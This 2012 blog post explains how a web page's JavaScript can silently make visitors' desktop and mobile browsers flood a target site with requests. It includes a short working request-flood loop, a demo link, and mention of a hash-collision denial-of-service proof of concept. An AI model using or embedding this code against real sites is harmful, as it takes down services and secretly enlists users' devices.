Posted on Tue 20 March 2012

dDoS - now on a phone near you

You may or may not now that your desktop browser can do arbitrary http requests using java script, all without any action from you. Of course, this can be abused to dDoS websites into oblivion, as shown by Anonymous. Funny thing is, this also works on mobile browsers - and you can't even tell that anything is happening if the site is at least a little clever.

Implementation is astonishingly simple:

function loop() {
	for(var i = 0; i < requestsPerLoop; i++) {
		try {
			var xhr = new XMLHttpRequest();
	    xhr.open('GET', target + "?dummy=" + i, false);
	    xhr.send();
	  } catch(e) {}

	  setTimeout("loop()", 100);
	}
}

We add a little timeout so the device doesn't feel sluggish. You can try it out here. (please only use on systems you control, I'm not responsible for any damages, yadda yadda yadda)

Real fun ensues if you combine this with the vulnerability in the hashing algorithm of many popular languages that was revelead on this year's Chaos Communication Congress. Incidentally, I've written a PoC for this.

The damage this tool can do on a vulnerable server with just one single source PC is amazing, but imagine requests coming from thousands of mobile phones - each only sending one or two, but that's more than enough. Good luck blocking them, especially since they've all got dynamic IP's !

Of course, the fix against that is simple - just patch your system -, but it doesn't help against old fashioned dDoS from those phones.

Tags: security, programming, web

© Julian Schrittwieser. Built using 開板. Theme by Giulio Fidente on github. .